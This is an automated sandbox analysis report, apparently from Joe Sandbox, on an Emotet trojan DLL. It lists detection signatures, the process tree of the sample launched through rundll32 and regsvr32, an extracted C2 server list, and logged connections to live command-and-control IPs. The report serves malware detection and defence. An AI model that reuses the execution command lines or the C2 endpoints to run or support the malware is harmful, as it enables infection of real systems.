Edit tour

Windows Analysis Report
6xfFjxyRXf

Overview

General Information

Sample Name:	6xfFjxyRXf (renamed file extension from none to dll)
Analysis ID:	669376
MD5:	f63300c5bbb25b90839996a6d1b8daf3
SHA1:	663b6080201bb8258c3a17b552094ae25d0ae9eb
SHA256:	9ba940714eb15665a5e28c43c1e4d1dee3f086d76c197015e0aa4b40b809ded0
Tags:	32dllexetrojan
Infos:

Detection

Emotet

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Snort IDS alert for network traffic

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Registers a DLL

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6908 cmdline: loaddll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6916 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6944 cmdline: rundll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 6932 cmdline: regsvr32.exe /s C:\Users\user\Desktop\6xfFjxyRXf.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Nrzawqzutwib\qenu.dlv" MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 6968 cmdline: rundll32.exe C:\Users\user\Desktop\6xfFjxyRXf.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7068 cmdline: rundll32.exe C:\Users\user\Desktop\6xfFjxyRXf.dll,DllUnregisterServerrrrrrrrrrrr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 5776 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7048 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2764 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4348 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5764 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["184.134.163.2:1", "192.16.0.0:1472", "180.4.0.0:1", "148.4.0.0:1", "116.4.0.0:1", "160.4.0.0:1", "128.4.0.0:1", "164.4.0.0:1", "124.4.0.0:1", "176.4.0.0:1", "232.22.167.2:48", "144.23.167.2:48", "195.194.0.0:7080", "241.253.2.0:2848", "112.135.213.118:5", "235.253.2.0:2848", "255.255.255.255:3", "243.253.2.0:3908", "245.253.2.0:5388", "192.141.163.2:1", "249.253.2.0:2864", "28.188.226.4:4597", "255.178.3.0:1432", "208.146.163.2:1", "250.178.3.0:5056", "92.179.3.0:808", "24.149.166.2:1", "94.179.3.0:2448", "246.178.3.0:5208", "208.60.169.2:1", "136.86.171.2:1", "32.76.231.4:1"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.406595295.0000000000BF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.406595295.0000000000BF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.917544011.0000000002B50000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.917544011.0000000002B50000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.406621589.00000000046B1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.406621589.00000000046B1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.917618972.0000000004481000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.917618972.0000000004481000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.414918130.0000000004F00000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.414918130.0000000004F00000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.406594585.0000000004680000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.406594585.0000000004680000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.regsvr32.exe.4f00000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4f00000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4680000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4680000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.46b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.rundll32.exe.46b0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.4480000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.4480000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4f00000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4f00000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.bf0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.bf0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4680000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4680000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.c20000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.c20000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.2b50000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.2b50000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.bf0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.bf0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4f60000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4f60000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.2b50000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.2b50000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 19 entries

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 3 - Source IP: 192.168.2.6 - Destination IP: 119.193.124.41

Timestamp:	192.168.2.6119.193.124.414985970802404304 07/20/22-01:13:31.686515
SID:	2404304
Source Port:	49859
Destination Port:	7080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 20 - Source IP: 192.168.2.6 - Destination IP: 51.91.76.89

Timestamp:	192.168.2.651.91.76.894984480802404338 07/20/22-01:13:29.114997
SID:	2404338
Source Port:	49844
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 6xfFjxyRXf.dll

Virustotal: Detection: 69%

Perma Link

Machine Learning detection for sample

Source: 6xfFjxyRXf.dll

Joe Sandbox ML: detected

Source: 00000005.00000002.917270830.0000000002A49000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Emotet {"C2 list": ["184.134.163.2:1", "192.16.0.0:1472", "180.4.0.0:1", "148.4.0.0:1", "116.4.0.0:1", "160.4.0.0:1", "128.4.0.0:1", "164.4.0.0:1", "124.4.0.0:1", "176.4.0.0:1", "232.22.167.2:48", "144.23.167.2:48", "195.194.0.0:7080", "241.253.2.0:2848", "112.135.213.118:5", "235.253.2.0:2848", "255.255.255.255:3", "243.253.2.0:3908", "245.253.2.0:5388", "192.141.163.2:1", "249.253.2.0:2864", "28.188.226.4:4597", "255.178.3.0:1432", "208.146.163.2:1", "250.178.3.0:5056", "92.179.3.0:808", "24.149.166.2:1", "94.179.3.0:2448", "246.178.3.0:5208", "208.60.169.2:1", "136.86.171.2:1", "32.76.231.4:1"]}

Source: 6xfFjxyRXf.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10023806 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,		2_2_10023806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10023806 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,		3_2_10023806

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 217.182.25.250 8080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 51.91.76.89 8080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 189.232.46.161 443	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 119.193.124.41 7080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 216.120.236.62 8080	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.6:49844 -> 51.91.76.89:8080
Source: Traffic	Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.6:49859 -> 119.193.124.41:7080

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 184.134.163.2:1
Source: Malware configuration extractor	IPs: 192.16.0.0:1472
Source: Malware configuration extractor	IPs: 180.4.0.0:1
Source: Malware configuration extractor	IPs: 148.4.0.0:1
Source: Malware configuration extractor	IPs: 116.4.0.0:1
Source: Malware configuration extractor	IPs: 160.4.0.0:1
Source: Malware configuration extractor	IPs: 128.4.0.0:1
Source: Malware configuration extractor	IPs: 164.4.0.0:1
Source: Malware configuration extractor	IPs: 124.4.0.0:1
Source: Malware configuration extractor	IPs: 176.4.0.0:1
Source: Malware configuration extractor	IPs: 232.22.167.2:48
Source: Malware configuration extractor	IPs: 144.23.167.2:48
Source: Malware configuration extractor	IPs: 195.194.0.0:7080
Source: Malware configuration extractor	IPs: 241.253.2.0:2848
Source: Malware configuration extractor	IPs: 112.135.213.118:5
Source: Malware configuration extractor	IPs: 235.253.2.0:2848
Source: Malware configuration extractor	IPs: 255.255.255.255:3
Source: Malware configuration extractor	IPs: 243.253.2.0:3908
Source: Malware configuration extractor	IPs: 245.253.2.0:5388
Source: Malware configuration extractor	IPs: 192.141.163.2:1
Source: Malware configuration extractor	IPs: 249.253.2.0:2864
Source: Malware configuration extractor	IPs: 28.188.226.4:4597
Source: Malware configuration extractor	IPs: 255.178.3.0:1432
Source: Malware configuration extractor	IPs: 208.146.163.2:1
Source: Malware configuration extractor	IPs: 250.178.3.0:5056
Source: Malware configuration extractor	IPs: 92.179.3.0:808
Source: Malware configuration extractor	IPs: 24.149.166.2:1
Source: Malware configuration extractor	IPs: 94.179.3.0:2448
Source: Malware configuration extractor	IPs: 246.178.3.0:5208
Source: Malware configuration extractor	IPs: 208.60.169.2:1
Source: Malware configuration extractor	IPs: 136.86.171.2:1
Source: Malware configuration extractor	IPs: 32.76.231.4:1

Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: WOODYNET-2US WOODYNET-2US

Source: Joe Sandbox View

IP Address: 217.182.25.250 217.182.25.250

Source: global traffic	TCP traffic: 192.168.2.6:49773 -> 216.120.236.62:8080
Source: global traffic	TCP traffic: 192.168.2.6:49844 -> 51.91.76.89:8080
Source: global traffic	TCP traffic: 192.168.2.6:49855 -> 217.182.25.250:8080
Source: global traffic	TCP traffic: 192.168.2.6:49859 -> 119.193.124.41:7080

Source: unknown

Network traffic detected: IP country count 17

Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803

Source: unknown	TCP traffic detected without corresponding DNS query: 216.120.236.62
Source: unknown	TCP traffic detected without corresponding DNS query: 216.120.236.62
Source: unknown	TCP traffic detected without corresponding DNS query: 216.120.236.62
Source: unknown	TCP traffic detected without corresponding DNS query: 189.232.46.161
Source: unknown	TCP traffic detected without corresponding DNS query: 189.232.46.161
Source: unknown	TCP traffic detected without corresponding DNS query: 189.232.46.161
Source: unknown	TCP traffic detected without corresponding DNS query: 189.232.46.161
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 217.182.25.250
Source: unknown	TCP traffic detected without corresponding DNS query: 217.182.25.250
Source: unknown	TCP traffic detected without corresponding DNS query: 217.182.25.250
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41

Source: svchost.exe, 0000000E.00000003.540373400.0000023F1435E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.540373400.0000023F1435E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.540373400.0000023F1435E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.540396421.0000023F1436F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z\|\|.\|\|58dfb4d5-be7e-424e-8739-cac99224843f\|\|1152921505695035586\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 0000000E.00000003.540373400.0000023F1435E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.540396421.0000023F1436F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z\|\|.\|\|58dfb4d5-be7e-424e-8739-cac99224843f\|\|1152921505695035586\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

Source: svchost.exe, 0000000E.00000002.584541505.0000023F14300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 0000000E.00000003.571353182.0000023F14388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 0000000E.00000003.571353182.0000023F14388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disneyplus.com/legal.
